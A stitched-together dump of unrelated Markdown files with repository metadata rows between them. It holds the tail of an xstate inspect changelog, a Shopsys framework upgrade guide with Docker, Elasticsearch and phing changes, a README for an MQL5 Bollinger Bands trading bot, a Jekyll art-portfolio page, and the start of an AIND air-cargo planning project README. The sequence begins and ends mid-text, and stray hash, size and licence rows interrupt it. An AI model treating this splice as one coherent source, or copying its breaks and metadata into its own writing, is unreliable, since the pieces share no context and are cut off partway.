- [#2957](https://github.com/statelyai/xstate/pull/2957) [`8550ddda7`](https://github.com/statelyai/xstate/commit/8550ddda73e2ad291e19173d7fa8d13e3336fbb9) Thanks [@davidkpiano](https://github.com/davidkpiano)! - The repository links have been updated from `github.com/davidkpiano` to `github.com/statelyai`.
## 0.6.1
### Patch Changes
- [#2907](https://github.com/statelyai/xstate/pull/2907) [`3a8eb6574`](https://github.com/statelyai/xstate/commit/3a8eb6574db51c3d02c900561be87a48fd9a973c) Thanks [@rossng](https://github.com/rossng)! - Fix crash when sending circular state objects (#2373).
## 0.6.0
### Minor Changes
- [#2640](https://github.com/statelyai/xstate/pull/2640) [`c73dfd655`](https://github.com/statelyai/xstate/commit/c73dfd655525546e59f00d0be88b80ab71239427) Thanks [@davidkpiano](https://github.com/statelyai)! - A serializer can now be specified as an option for `inspect(...)` in the `.serialize` property. It should be a [replacer function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/JSON/stringify#the_replacer_parameter):
```js
// ...
inspect({
// ...
serialize: (key, value) => {
if (value instanceof Map) {
return 'map';
}
return value;
}
});
// ...
// Will be inspected as:
// {
// type: 'EVENT_WITH_MAP',
// map: 'map'
// }
someService.send({
type: 'EVENT_WITH_MAP',
map: new Map()
});
```
* [#2894](https://github.com/statelyai/xstate/pull/2894) [`8435c5b84`](https://github.com/statelyai/xstate/commit/8435c5b841e318c5d35dfea65242246dfb4b34f8) Thanks [@Andarist](https://github.com/Andarist)! - The package has been upgraded to be compatible with `[email protected]`. The WS server created server-side has to be of a compatible version now.
## 0.5.2
### Patch Changes
- [#2827](https://github.com/statelyai/xstate/pull/2827) [`49de77085`](https://github.com/statelyai/xstate/commit/49de770856965b0acec846c1ff5c29463335aab0) Thanks [@erlendfh](https://github.com/erlendfh)! - Fixed a bug in `createWebsocketReceiver` so that it works as expected with a WebSocket connection.
## 0.5.1
### Patch Changes
- [#2728](https://github.com/statelyai/xstate/pull/2728) [`8171b3e12`](https://github.com/statelyai/xstate/commit/8171b3e127a289199bbcedb5cec839e9da0a1bb2) Thanks [@jacksteamdev](https://github.com/jacksteamdev)! - Fix server inspector to handle WebSocket messages as Buffer
## 0.5.0
### Minor Changes
- [`4f006ffc`](https://github.com/statelyai/xstate/commit/4f006ffc0d39854c77caf3c583bb0c9e058259af) [#2504](https://github.com/statelyai/xstate/pull/2504) Thanks [@Andarist](https://github.com/Andarist)! - `Inspector`'s `subscribe` callback will now get immediately called with the current state at the subscription time.
### Patch Changes
- [`e90b764e`](https://github.com/statelyai/xstate/commit/e90b764e4ead8bf11d273ee385a8c2db392251a4) [#2492](https://github.com/statelyai/xstate/pull/2492) Thanks [@Andarist](https://github.com/Andarist)! - Fixed a minor issue with sometimes sending `undefined` state to the inspector which resulted in an error being thrown in it when resolving the received state. The problem was very minor as no functionality was broken because of it.
## 0.4.1
### Patch Changes
- [`d9282107`](https://github.com/statelyai/xstate/commit/d9282107b931b867d9cd297ede71b55fe11eb74d) [#1800](https://github.com/statelyai/xstate/pull/1800) Thanks [@davidkpiano](https://github.com/statelyai)! - Fixed a bug where services were not being registered by the inspect client, affecting the ability to send events to inspected services.
## 0.4.0
### Minor Changes
- [`63ba888e`](https://github.com/statelyai/xstate/commit/63ba888e19bd2b72f9aad2c9cd36cde297e0ffe5) [#1770](https://github.com/statelyai/xstate/pull/1770) Thanks [@davidkpiano](https://github.com/statelyai)! - It is now easier for developers to create their own XState inspectors, and even inspect services offline.
A **receiver** is an actor that receives inspector events from a source, such as `"service.register"`, `"service.state"`, `"service.event"`, etc. This update includes two receivers:
- `createWindowReceiver` - listens to inspector events from a parent window (for both popup and iframe scenarios)
- 🚧 `createWebSocketReceiver` (experimental) - listens to inspector events from a WebSocket server
Here's how it works:
**Application (browser) code**
```js
import { inspect } from '@xstate/inspect';
inspect(/* options */);
// ...
interpret(someMachine, { devTools: true }).start();
```
**Inspector code**
```js
import { createWindowReceiver } from '@xstate/inspect';
const windowReceiver = createWindowReceiver(/* options? */);
windowReceiver.subscribe(event => {
// here, you will receive events like:
// { type: "service.register", machine: ..., state: ..., sessionId: ... }
console.log(event);
});
```
The events you will receive are `ParsedReceiverEvent` types:
```ts
export type ParsedReceiverEvent =
| {
type: 'service.register';
machine: StateMachine<any, any, any>;
state: State<any, any>;
id: string;
sessionId: string;
parent?: string;
source?: string;
}
| { type: 'service.stop'; sessionId: string }
| {
type: 'service.state';
state: State<any, any>;
sessionId: string;
}
| { type: 'service.event'; event: SCXML.Event<any>; sessionId: string };
```
Given these events, you can visualize the service machines and their states and events however you'd like.
## 0.3.0
### Minor Changes
- [`a473205d`](https://github.com/statelyai/xstate/commit/a473205d214563033cd250094d2344113755bd8b) [#1699](https://github.com/statelyai/xstate/pull/1699) Thanks [@davidkpiano](https://github.com/statelyai)! - The `@xstate/inspect` tool now uses [`fast-safe-stringify`](https://www.npmjs.com/package/fast-safe-stringify) for internal JSON stringification of machines, states, and events when regular `JSON.stringify()` fails (e.g., due to circular structures).
## 0.2.0
### Minor Changes
- [`1725333a`](https://github.com/statelyai/xstate/commit/1725333a6edcc5c1e178228aa869c907d3907be5) [#1599](https://github.com/statelyai/xstate/pull/1599) Thanks [@davidkpiano](https://github.com/statelyai)! - The `@xstate/inspect` package is now built with Rollup which has fixed an issue with TypeScript compiler inserting references to `this` in the top-level scope of the output modules and thus making it harder for some tools (like Rollup) to re-bundle dist files as `this` in modules (as they are always in strict mode) is `undefined`.
| 44.184211 | 542 | 0.717094 | eng_Latn | 0.742931 |
e0411935f016c5c2df35df71d26ee27ed3e23cdd | 22,521 | md | Markdown | upgrade/UPGRADE-v7.3.0.md | simara-svatopluk/shopsys | 8ae242f9d5d6fcbf852239fc4ba4d436cf659388 | [
"PostgreSQL"
] | null | null | null | upgrade/UPGRADE-v7.3.0.md | simara-svatopluk/shopsys | 8ae242f9d5d6fcbf852239fc4ba4d436cf659388 | [
"PostgreSQL"
] | null | null | null | upgrade/UPGRADE-v7.3.0.md | simara-svatopluk/shopsys | 8ae242f9d5d6fcbf852239fc4ba4d436cf659388 | [
"PostgreSQL"
] | null | null | null | # [Upgrade from v7.2.2 to v7.3.0](https://github.com/shopsys/shopsys/compare/v7.2.2...v7.3.0)
This guide contains instructions to upgrade from version v7.2.2 to v7.3.0.
**Before you start, don't forget to take a look at [general instructions](https://github.com/shopsys/shopsys/blob/7.3/UPGRADE.md) about upgrading.**
There you can find links to upgrade notes for other versions too.
## [shopsys/framework]
### Infrastructure
- update your `docker/php-fpm/Dockerfile` production stage build ([#1177](https://github.com/shopsys/shopsys/pull/1177))
```diff
RUN composer install --optimize-autoloader --no-interaction --no-progress --no-dev
-RUN php phing composer-prod npm dirs-create assets
+RUN php phing build-deploy-part-1-db-independent
```
- update Elasticsearch build configuration to allow sorting each language properly ([#1069](https://github.com/shopsys/shopsys/pull/1069))
- copy new [Dockerfile from shopsys/project-base](https://github.com/shopsys/project-base/blob/v7.3.0/docker/elasticsearch/Dockerfile) into new `docker/elasticsearch` folder
- update docker compose files (`docker-compose.yml`, `docker-compose.yml.dist`, `docker-compose-mac.yml.dist` and `docker-compose-win.yml.dist`)
```diff
elasticsearch:
- image: docker.elastic.co/elasticsearch/elasticsearch-oss:6.3.2
+ build:
+ context: .
+ dockerfile: docker/elasticsearch/Dockerfile
container_name: shopsys-framework-elasticsearch
```
- for natively installed Elasticsearch (for example in production) you have to [install ICU analysis plugin](https://www.elastic.co/guide/en/elasticsearch/plugins/current/analysis-icu.html) manually
- if you deploy to the google cloud, copy new [`.ci/deploy-to-google-cloud.sh`](https://github.com/shopsys/project-base/blob/v7.3.0/.ci/deploy-to-google-cloud.sh) script from `shopsys/project-base` ([#1126](https://github.com/shopsys/shopsys/pull/1126))
### Configuration
- for `symfony/monolog-bundle` in version `>=3.4.0` you have to unset the incompatible `excluded_404s` configuration from monolog handlers that don't use the `fingers_crossed` type ([#1154](https://github.com/shopsys/shopsys/pull/1154))
- for lower versions of the library it's still recommended to do so
- in `app/config/packages/dev/monolog.yml`:
```diff
monolog:
handlers:
main:
# change "fingers_crossed" handler to "group" that works as a passthrough to "nested"
type: group
members: [ nested ]
+ excluded_404s: false
```
- in `app/config/packages/test/monolog.yml`:
```diff
monolog:
handlers:
main:
type: "null"
+ excluded_404s: false
```
- change `name.keyword` field in Elasticsearch to sort each language properly ([#1069](https://github.com/shopsys/shopsys/pull/1069))
- update field `name.keyword` to type `icu_collation_keyword` in `src/Shopsys/ShopBundle/Resources/definition/product/*.json` and set its `language` parameter according to what locale does your domain have:
- example for English domain from [`1.json` of shopsys/project-base](https://github.com/shopsys/project-base/blob/v7.3.0/src/Shopsys/ShopBundle/Resources/definition/product/1.json) repository.
```diff
"name": {
"type": "text",
"analyzer": "stemming",
"fields": {
"keyword": {
- "type": "keyword"
+ "type": "icu_collation_keyword",
+ "language": "en",
+ "index": false
}
}
}
```
- change `TestFlag` and `TestFlagBrand` tests in `FilterQueryTest.php` to assert IDs correctly:
```diff
# TestFlag()
- $this->assertIdWithFilter($filter, [1, 5, 50, 16, 33, 39, 70, 40, 45]);
+ $this->assertIdWithFilter($filter, [1, 5, 50, 16, 33, 70, 39, 40, 45]);
# TestFlagBrand()
- $this->assertIdWithFilter($filter, [19, 17]);
+ $this->assertIdWithFilter($filter, [17, 19]);
```
- don't forget to recreate structure and export products to Elasticsearch afterwards with `php phing product-search-recreate-structure product-search-export-products`
- extend DI configuration for your project by updating ([#1049](https://github.com/shopsys/shopsys/pull/1049))
- `src/Shopsys/ShopBundle/Resources/config/services.yml`
```diff
- Shopsys\ShopBundle\Model\:
- resource: '../../Model/**/*{Facade,Factory,Repository}.php'
+ Shopsys\ShopBundle\:
+ resource: '../../**/*{Calculation,Facade,Factory,Generator,Handler,InlineEdit,Listener,Loader,Mapper,Parser,Provider,Recalculator,Registry,Repository,Resolver,Service,Scheduler,Subscriber,Transformer}.php'
+ exclude: '../../{Command,Controller,DependencyInjection,Form,Migrations,Resources,Twig}'
```
- remove the useless route `front_category_panel` from your `routing_front.yml` ([#1042](https://github.com/shopsys/shopsys/pull/1042))
- you'll find the configuration file in `src/Shopsys/ShopBundle/Resources/config/`
### Tools
- use the `build.xml` [Phing configuration](../docs/introduction/console-commands-for-application-management-phing-targets.md) from the `shopsys/framework` package ([#1068](https://github.com/shopsys/shopsys/pull/1068))
- assuming your `build.xml` and `build-dev.xml` are the same as in `shopsys/project-base` in `v7.2.2`, just remove `build-dev.xml` and replace `build.xml` with this file:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<project name="Shopsys Framework" default="list">
<property file="${project.basedir}/build/build.local.properties"/>
<property name="path.root" value="${project.basedir}"/>
<property name="path.vendor" value="${path.root}/vendor"/>
<property name="path.framework" value="${path.vendor}/shopsys/framework"/>
<property name="is-multidomain" value="true"/>
<property name="phpstan.level" value="0"/>
<import file="${path.framework}/build.xml"/>
</project>
```
- if there are any changes in the your phing configuration, you'll need to make some customizations
- read about [customization of phing targets and properties](../docs/introduction/console-commands-for-application-management-phing-targets.md#customization-of-phing-targets-and-properties) in the docs
- if you have some own additional target definitions, copy them into your `build.xml`
- if you have modified any targets, overwrite them in your `build.xml`
- examine the target in the `shopsys/framework` package (either on [GitHub](https://github.com/shopsys/shopsys/blob/7.3/packages/framework/build.xml) or locally in `vendor/shopsys/framework/build.xml`)
- it's possible that the current target's definition suits your needs now after the upgrade - you don't have to overwrite it if that's the case
- for future upgradability of your project, it's better to use the original target via `shopsys_framework.TARGET_NAME` if that's possible (eg. if you want to execute a command before or after the original task)
- if you think we can support your use case better via [phing target extensibility](../docs/contributing/guidelines-for-phing-targets.md#extensibility), please [open an issue](https://github.com/shopsys/shopsys/issues/new) or [create a pull request](/docs/contributing/guidelines-for-pull-request.md)
- if you have deleted any targets, overwrite them in your `build.xml` with a fail task so it doesn't get executed by mistake:
```xml
<target name="deleted-target" hidden="true">
<fail message="Target 'deleted-target' is disabled on this project."/>
</target>
```
- if you modified the locales for extraction in `dump-translations`, you can now overwrite just a phing property `translations.dump.locales` instead of overwriting the whole target
- for example, if you want to extract locales for German and English, add `<property name="translations.dump.locales" value="de en"/>` to your `build.xml`
- some phing targets were marked as deprecated or were renamed, stop using them and use the new ones (the original targets will still work, but a warning message will be displayed):
- `dump-translations` and `dump-translations-project-base` were deprecated, use `translations-dump` instead
- `tests-static` was deprecated, use `tests-unit` instead
- `test-db-check-schema` was deprecated, it is run automatically after DB migrations are executed
- `build-demo-ci-diff` and `checks-ci-diff` were deprecated, use `build-demo-ci` and `checks-ci` instead
- `composer` was deprecated, use `composer-prod` instead
- `generate-build-version` was deprecated, use `build-version-generate` instead
- `(test-)create-domains-data` was deprecated, use `(test-)domains-data-create` instead
- `(test-)create-domains-db-functions` was deprecated, use `(test-)domains-db-functions-create` instead
- `(test-)generate-friendly-urls` was deprecated, use `(test-)friendly-urls-generate` instead
- `(test-)replace-domains-urls` was deprecated, use `(test-)domains-urls-replace` instead
- `(test-)load-plugin-demo-data` was deprecated, use `(test-)plugin-demo-data-load` instead
- don't forget to update your Dockerfiles, Kubernetes manifests, scripts and other files that might reference the phing targets above
- we recommend upgrading PHPStan to level 1
  - you'll find detailed instructions in the separate article [Upgrade Instructions for Upgrading PHPStan to Level 1](/upgrade/phpstan-level-1.md)
- update your installation script (`scripts/install.sh`) to lower installation time by not running tests and standards checks during the build
```diff
- docker-compose exec php-fpm ./phing db-create test-db-create build-demo-dev
+ docker-compose exec php-fpm ./phing db-create test-db-create build-demo-dev-quick error-pages-generate
```
### Application
- **BC-BREAK** fix inconsistently named field `shortDescription` in Elasticsearch ([#1180](https://github.com/shopsys/shopsys/pull/1180))
- in `ProductSearchExportRepositoryTest::getExpectedStructureForRepository()` (the test will fail otherwise)
```diff
- 'shortDescription',
+ 'short_description',
```
- in other places you might have used it in your custom code
- follow instructions in [the separate article](upgrade-instructions-for-read-model-for-product-lists.md) to introduce read model for frontend product lists into your project ([#1018](https://github.com/shopsys/shopsys/pull/1018))
- we recommend to read [Introduction to Read Model](../docs/model/introduction-to-read-model.md) article
- copy a new functional test to avoid regression of issues with creating product variants in the future ([#1113](https://github.com/shopsys/shopsys/pull/1113))
- you can copy-paste the class [`ProductVariantCreationTest.php`](https://github.com/shopsys/project-base/blob/v7.3.0/tests/ShopBundle/Functional/Model/Product/ProductVariantCreationTest.php) into `tests/ShopBundle/Functional/Model/Product/` in your project
- prevent indexing `CustomerPassword:setNewPassword` by robots ([#1119](https://github.com/shopsys/shopsys/pull/1119))
- add a `meta_robots` Twig block to your `@ShopsysShop/Front/Content/Registration/setNewPassword.html.twig` template:
```twig
{% block meta_robots -%}
<meta name="robots" content="noindex, follow">
{% endblock %}
```
- you should prevent indexing by robots using this block on all in your project created pages that are secured by an URL hash
- use `autocomplete="new-password"` attribute for password changing inputs to prevent filling it by browser ([#1121](https://github.com/shopsys/shopsys/pull/1121))
- in `shopsys/project-base` repository this change was needed in 3 form classes (`NewPasswordFormType`, `UserFormType` and `RegistrationFormType`):
```diff
'type' => PasswordType::class,
'options' => [
- 'attr' => ['autocomplete' => 'off'],
+ 'attr' => ['autocomplete' => 'new-password'],
],
```
- update your tests to use interfaces of factories fetched from dependency injection container ([#970](https://github.com/shopsys/shopsys/pull/970/files))
- example
```diff
- /** @var \Shopsys\FrameworkBundle\Model\Cart\Item\CartItemFactory $cartItemFactory */
- $cartItemFactory = $this->getContainer()->get(CartItemFactory::class);
+ /** @var \Shopsys\FrameworkBundle\Model\Cart\Item\CartItemFactoryInterface $cartItemFactory */
+ $cartItemFactory = $this->getContainer()->get(CartItemFactoryInterface::class);
```
- you have to configure factories in `services_test.yml` the same way as it is in the application (`services.yml`), ie. alias the interface with your implementation
```diff
- Shopsys\FrameworkBundle\Model\Customer\UserDataFactory:
+ Shopsys\FrameworkBundle\Model\Customer\UserDataFactoryInterface:
alias: Shopsys\ShopBundle\Model\Customer\UserDataFactory
```
- you can see updated tests from clean project-base in the [pull request](https://github.com/shopsys/shopsys/pull/970/files)
- check your VAT calculations after it was modified in `shopsys/framework` ([#1129](https://github.com/shopsys/shopsys/pull/1129))
- we strongly recommend seeing [the description of the PR](https://github.com/shopsys/shopsys/pull/1129) to understand the scope of this change
    - to ensure your data is consistent, run DB migrations on your demo data and on a copy of the production database
        - if you modified the price calculation or altered the prices in the database directly, the migration might fail during a checksum verification - in that case the DB transaction will be reverted and the migration will tell you what to do
- copy the functional test [OrderEditTest.php](https://github.com/shopsys/project-base/blob/v7.3.0/tests/ShopBundle/Functional/Model/Order/OrderEditTest.php) into `tests/ShopBundle/Functional/Model/Order/` to test editing of order items
- for the test to work, add test service definitions for `OrderItemDataFactory` and `OrderItemFactory` in your `src/Shopsys/ShopBundle/Resources/config/services_test.yml` configuration:
```diff
Shopsys\FrameworkBundle\Model\Customer\UserDataFactoryInterface: '@Shopsys\ShopBundle\Model\Customer\UserDataFactory'
+ Shopsys\FrameworkBundle\Model\Order\Item\OrderItemDataFactoryInterface: '@Shopsys\ShopBundle\Model\Order\Item\OrderItemDataFactory'
+
+ Shopsys\FrameworkBundle\Model\Order\Item\OrderItemFactoryInterface: '@Shopsys\FrameworkBundle\Model\Order\Item\OrderItemFactory'
+
Shopsys\FrameworkBundle\Model\Order\OrderDataFactoryInterface: '@Shopsys\ShopBundle\Model\Order\OrderDataFactory'
```
- stop using the deprecated method `\Shopsys\FrameworkBundle\Model\Pricing\PriceCalculation::getVatCoefficientByPercent()`, use `PriceCalculation::getVatAmountByPriceWithVat()` for VAT calculation instead
- if you want to customize the VAT calculation (eg. revert it back to the previous implementation), extend the service `@Shopsys\FrameworkBundle\Model\Pricing\PriceCalculation` and override the method `getVatAmountByPriceWithVat()`
- if you created new tests regarding the price calculation they might start failing after the upgrade - in such case, please see the new VAT calculation and change the tests expectations accordingly
- if you have overridden the `orderItems.html.twig` template, you'll need to update it to accommodate the two new columns:
```diff
<thead>
<tr>
<th>{{ 'Name'|trans }}</th>
<th>{{ 'Catalogue number'|trans }}</th>
<th class="text-right">{{ 'Unit price including VAT'|trans }}</th>
<th class="text-right">{{ 'Amount'|trans }}</th>
<th class="text-right">{{ 'Unit'|trans }}</th>
<th class="text-right">{{ 'VAT rate (%)'|trans }}</th>
+ <th class="text-center">
+ <span class="display-inline-block" style="width: 80px">
+ {{ 'Set prices manually'|trans }}
+ <i class="svg svg-info cursor-help js-tooltip"
+ data-toggle="tooltip" data-placement="bottom"
+ title="{{ 'All prices have to be handled manually if checked, otherwise the unit price without VAT and the total prices for that item will be recalculated automatically.'|trans }}"
+ ></i>
+ </span>
+ </th>
+ <th class="text-right">{{ 'Unit price excluding VAT'|trans }}</th>
<th class="text-right">{{ 'Total including VAT'|trans }}</th>
<th class="text-right">{{ 'Total excluding VAT'|trans }}</th>
<th></th>
</tr>
</thead>
```
```diff
<tfoot>
<tr>
- <td colspan="9">
+ <td colspan="11">
{# ... #}
</td>
</tr>
<tr>
- <th colspan="6">{{ 'Total'|trans }}:</th>
+ <th colspan="8">{{ 'Total'|trans }}:</th>
{# ... #}
</tr>
</tfoot>
```
- use automatic wiring of Redis clients for easier checking and cleaning ([#1161](https://github.com/shopsys/shopsys/pull/1161))
- if you have redefined the service `@Shopsys\FrameworkBundle\Component\Redis\RedisFacade` or `@Shopsys\FrameworkBundle\Command\CheckRedisCommand` in your project, or you instantiate the classes in your code:
- instead of instantiating `RedisFacade` with an array of cache clients to be cleaned by `php phing redis-clean`, pass an array of all redis clients and another array of redis clients you don't want to clean (eg. `global` and `session`)
```diff
Shopsys\FrameworkBundle\Component\Redis\RedisFacade:
arguments:
- - '@snc_redis.doctrine_metadata'
- - '@snc_redis.doctrine_query'
- - '@snc_redis.my_custom_cache'
+ $allClients: !tagged snc_redis.client
+ $persistentClients:
+ - '@snc_redis.global'
+ - '@snc_redis.session'
```
- this allows you to use `!tagged snc_redis.client` in your DIC config for the first argument, ensuring that newly created clients will be registered by the facade
- instead of instantiating `CheckRedisCommand` with an array of redis clients, pass an instance of `RedisFacade` instead
- modify the functional test `\Tests\ShopBundle\Functional\Component\Redis\RedisFacadeTest` so it creates `RedisFacade` using the two arrays and add a new test case `testNotCleaningPersistentClient`
- you can copy-paste the [`RedisFacadeTest`](https://github.com/shopsys/project-base/blob/v7.3.0/tests/ShopBundle/Functional/Component/Redis/RedisFacadeTest.php) from `shopsys/project-base`
- implement `createFromIdAndName(int $id, string $name): FriendlyUrlData` method in your implementations of `FriendlyUrlDataFactoryInterface` as the method will be added to the interface in `v8.0.0` version ([#948](https://github.com/shopsys/shopsys/pull/948))
- you can take a look at the [default implementation](https://github.com/shopsys/shopsys/pull/948/files#diff-3bf55feed4b73ffb418e24c623673188R37) and inspire yourself
- use aliases of index and build version in index name in Elasticsearch for better usage when deploying ([#1133](https://github.com/shopsys/shopsys/pull/1133))
- method `ElasticsearchStructureManager::getIndexName` is deprecated, use one of the following instead
- use `ElasticsearchStructureManager::getAliasName` if you need to access the index for read operations (eg. searching, filtering)
- use `ElasticsearchStructureManager::getCurrentIndexName` if need to write to the index or manipulate it (eg. product export)
- run `php phing product-search-recreate-structure` to generate new indexes with aliases
- use method `ElasticsearchStructureManager::deleteCurrentIndex` instead of `ElasticsearchStructureManager::deleteIndex` as it was deprecated
- if you have extended `ElasticsearchStructureManager` in `services.yml` you'll need to send the `build-version` parameter to the 4th argument of the constructor or call `setBuildVersion` setter injector like this:
```diff
Shopsys\FrameworkBundle\Component\Elasticsearch\ElasticsearchStructureManager:
arguments:
- '%shopsys.elasticsearch.structure_dir%'
- '%env(ELASTIC_SEARCH_INDEX_PREFIX)%'
+ calls:
+ - method: setBuildVersion
+ arguments:
+ - '%build-version%'
```
- copy a new functional test [`ElasticsearchStructureUpdateCheckerTest`](https://github.com/shopsys/project-base/blob/v7.3.0/tests/ShopBundle/Functional/Component/Elasticsearch/ElasticsearchStructureUpdateCheckerTest.php) into `tests/ShopBundle/Functional/Component/Elasticsearch/` in your project
- this test will ensure that the check whether to update Elasticsearch structure works as intended
- fix typo in `OrderDataFixture::getRandomCountryFromFirstDomain()`
```diff
- $randomPaymentReferenceName = $this->faker->randomElement([
+ $randomCountryReferenceName = $this->faker->randomElement([
```
[shopsys/framework]: https://github.com/shopsys/framework
| 74.820598 | 312 | 0.666755 | eng_Latn | 0.839841 |
e041976c91ec055f317ff419bbc395b1f3806794 | 859 | md | Markdown | README.md | terencebeauj/Trading_bot_BollingBands | 839fc5eac8595094a3cf9dcfb53664f281dbf225 | [
"MIT"
] | 2 | 2021-07-08T19:09:44.000Z | 2021-12-28T04:04:18.000Z | README.md | terencebeauj/Trading_bot_BollingBands | 839fc5eac8595094a3cf9dcfb53664f281dbf225 | [
"MIT"
] | null | null | null | README.md | terencebeauj/Trading_bot_BollingBands | 839fc5eac8595094a3cf9dcfb53664f281dbf225 | [
"MIT"
] | 2 | 2021-07-08T19:09:50.000Z | 2021-12-27T12:13:07.000Z | # Trading_bot_BollingerBands
A MQL5 trading bot that uses the Bollinger Bands indicator to take trades based on the volatility of a single currency.
You can use this Expert Advisor as an example and try to improve it to develop a more advanced bot (e.g., with money management) with the powerful MQL5 language.
You can optimize the input parameters using the Genetic Algorithm of the MT5 platform (or write your own optimization algorithm with the language, using GA, particle swarm, Bayesian optimization, etc.).
But be really careful of overfitting: try not to optimize too many parameters, and always perform an Out-Of-Sample optimization.
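If you are new to MQL5, the sketch below shows the general pattern such an Expert Advisor can use to read the Bollinger Bands values; it is a simplified illustration under assumed settings (20-period bands, 2.0 deviation), not the actual code of this repository:
```mql5
int bandsHandle;

int OnInit()
  {
   // Create a Bollinger Bands indicator handle (assumed settings: 20 period, 2.0 deviation)
   bandsHandle = iBands(_Symbol, _Period, 20, 0, 2.0, PRICE_CLOSE);
   return (bandsHandle != INVALID_HANDLE) ? INIT_SUCCEEDED : INIT_FAILED;
  }

void OnTick()
  {
   double upper[1], lower[1];
   // Buffer 1 = upper band, buffer 2 = lower band
   if(CopyBuffer(bandsHandle, 1, 0, 1, upper) < 0) return;
   if(CopyBuffer(bandsHandle, 2, 0, 1, lower) < 0) return;
   // Entry/exit decisions based on price relative to the bands would go here
  }
```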


| 95.444444 | 203 | 0.813737 | eng_Latn | 0.98263 |
e0419cac2cd12837d39d6ded02cacfc9e2e23657 | 902 | md | Markdown | Portfolio/Paintings.md | pdr-github/pdr-github.github.io | b39bd16b6b2cfa34d03b76cac981471b625f672e | [
"MIT"
] | null | null | null | Portfolio/Paintings.md | pdr-github/pdr-github.github.io | b39bd16b6b2cfa34d03b76cac981471b625f672e | [
"MIT"
] | null | null | null | Portfolio/Paintings.md | pdr-github/pdr-github.github.io | b39bd16b6b2cfa34d03b76cac981471b625f672e | [
"MIT"
] | null | null | null | ---
layout: default
title: Paintings & Illustrations
---
<div class="artpost" align="center">
<h1 class="artpost-title">[Art Portfolio]</h1>
<a href="/Portfolio/MoonGallery"><button class="button">Moon Gallery Project</button></a>
<a href="/Portfolio/Paintings"><button class="button" style="background-color: black; color: white">Paintings & Illustrations</button></a>
<a href="/Portfolio/GraphicDes"><button class="button">Graphic Design</button></a>
<a href="/Portfolio/Origami"><button class="button">Origami</button></a>
<hr>
<h1>{{ page.title }}</h1>
<br>
</div>
<div>
{% include Portfolio/Paintings/images_thumb.md%}
<!-- The Modal -->
<div id="myModal" class="modal">
<span class="close cursor" onclick="closeModal()">×</span>
<div class="modal-content">
{% include Portfolio/Paintings/images_modal.md%}
</div>
</div>
{% include Scripts/modal.md %}
</div>
| 32.214286 | 139 | 0.676275 | eng_Latn | 0.319086 |
e041d52a22996c8e4bdea08db1de5af02067533f | 10,996 | md | Markdown | README.md | MallettJamesG/AIND-Planning | 390909a804b2a7061ab7d9794acaec97daee7dd9 | [
"MIT"
] | null | null | null | README.md | MallettJamesG/AIND-Planning | 390909a804b2a7061ab7d9794acaec97daee7dd9 | [
"MIT"
] | null | null | null | README.md | MallettJamesG/AIND-Planning | 390909a804b2a7061ab7d9794acaec97daee7dd9 | [
"MIT"
] | null | null | null |
# Implement a Planning Search
## Synopsis
This project includes skeletons for the classes and functions needed to solve deterministic logistics planning problems for an Air Cargo transport system using a planning search agent.
With progression search algorithms like those in the navigation problem from lecture, optimal plans for each
problem will be computed. Unlike the navigation problem, there is no simple distance heuristic to aid the agent.
Instead, you will implement domain-independent heuristics.

- Part 1 - Planning problems:
- READ: applicable portions of the Russel/Norvig AIMA text
- GIVEN: problems defined in classical PDDL (Planning Domain Definition Language)
- TODO: Implement the Python methods and functions as marked in `my_air_cargo_problems.py`
- TODO: Experiment and document metrics
- Part 2 - Domain-independent heuristics:
- READ: applicable portions of the Russel/Norvig AIMA text
- TODO: Implement relaxed problem heuristic in `my_air_cargo_problems.py`
- TODO: Implement Planning Graph and automatic heuristic in `my_planning_graph.py`
- TODO: Experiment and document metrics
- Part 3 - Written Analysis
## Environment requirements
- Python 3.4 or higher
- Starter code includes a copy of [companion code](https://github.com/aimacode) from the Stuart Russel/Norvig AIMA text.
## Project Details
### Part 1 - Planning problems
#### READ: Stuart Russel and Peter Norvig text:
"Artificial Intelligence: A Modern Approach" 3rd edition chapter 10 *or* 2nd edition Chapter 11 on Planning, available [on the AIMA book site](http://aima.cs.berkeley.edu/2nd-ed/newchap11.pdf) sections:
- *The Planning Problem*
- *Planning with State-space Search*
#### GIVEN: classical PDDL problems
All problems are in the Air Cargo domain. They have the same action schema defined, but different initial states and goals.
- Air Cargo Action Schema:
```
Action(Load(c, p, a),
PRECOND: At(c, a) ∧ At(p, a) ∧ Cargo(c) ∧ Plane(p) ∧ Airport(a)
EFFECT: ¬ At(c, a) ∧ In(c, p))
Action(Unload(c, p, a),
PRECOND: In(c, p) ∧ At(p, a) ∧ Cargo(c) ∧ Plane(p) ∧ Airport(a)
EFFECT: At(c, a) ∧ ¬ In(c, p))
Action(Fly(p, from, to),
PRECOND: At(p, from) ∧ Plane(p) ∧ Airport(from) ∧ Airport(to)
EFFECT: ¬ At(p, from) ∧ At(p, to))
```
- Problem 1 initial state and goal:
```
Init(At(C1, SFO) ∧ At(C2, JFK)
∧ At(P1, SFO) ∧ At(P2, JFK)
∧ Cargo(C1) ∧ Cargo(C2)
∧ Plane(P1) ∧ Plane(P2)
∧ Airport(JFK) ∧ Airport(SFO))
Goal(At(C1, JFK) ∧ At(C2, SFO))
```
- Problem 2 initial state and goal:
```
Init(At(C1, SFO) ∧ At(C2, JFK) ∧ At(C3, ATL)
∧ At(P1, SFO) ∧ At(P2, JFK) ∧ At(P3, ATL)
∧ Cargo(C1) ∧ Cargo(C2) ∧ Cargo(C3)
∧ Plane(P1) ∧ Plane(P2) ∧ Plane(P3)
∧ Airport(JFK) ∧ Airport(SFO) ∧ Airport(ATL))
Goal(At(C1, JFK) ∧ At(C2, SFO) ∧ At(C3, SFO))
```
- Problem 3 initial state and goal:
```
Init(At(C1, SFO) ∧ At(C2, JFK) ∧ At(C3, ATL) ∧ At(C4, ORD)
∧ At(P1, SFO) ∧ At(P2, JFK)
∧ Cargo(C1) ∧ Cargo(C2) ∧ Cargo(C3) ∧ Cargo(C4)
∧ Plane(P1) ∧ Plane(P2)
∧ Airport(JFK) ∧ Airport(SFO) ∧ Airport(ATL) ∧ Airport(ORD))
Goal(At(C1, JFK) ∧ At(C3, JFK) ∧ At(C2, SFO) ∧ At(C4, SFO))
```
#### TODO: Implement methods and functions in `my_air_cargo_problems.py`
- `AirCargoProblem.get_actions` method including `load_actions` and `unload_actions` sub-functions
- `AirCargoProblem.actions` method
- `AirCargoProblem.result` method
- `air_cargo_p2` function
- `air_cargo_p3` function
#### TODO: Experiment and document metrics for non-heuristic planning solution searches
